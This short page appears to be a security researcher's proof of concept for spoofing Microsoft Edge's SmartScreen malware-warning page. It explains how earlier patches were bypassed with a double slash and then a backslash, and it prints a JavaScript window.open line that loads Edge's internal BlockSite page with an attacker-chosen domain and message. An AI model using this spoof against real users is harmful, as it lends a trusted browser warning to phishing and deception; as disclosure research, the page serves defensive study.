Microsoft Edge - SmartScreen Page Spoof






The original version of this PoC was patched here, but a simple change was found the same day of the patch: instead of encoding the dot, we are now adding a double slash before the "BlockSite".

The bypass of this PoC was patched on 2017-05-09, but a simple change was found the same day of the patch: instead of adding a double slash before the "BlockSite", we add a backslash.

Please, read the full blog-post for more information. How to bypass the patch to keep spoofing the address bar with the Malware Warning

The Code:

window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/\\BlockSite.htm?" +
"BlockedDomain=" + tUrl.value + "&Host=" + taMsg.value + "#" + tUrl.value);



Questions? Ping me at @magicmac2000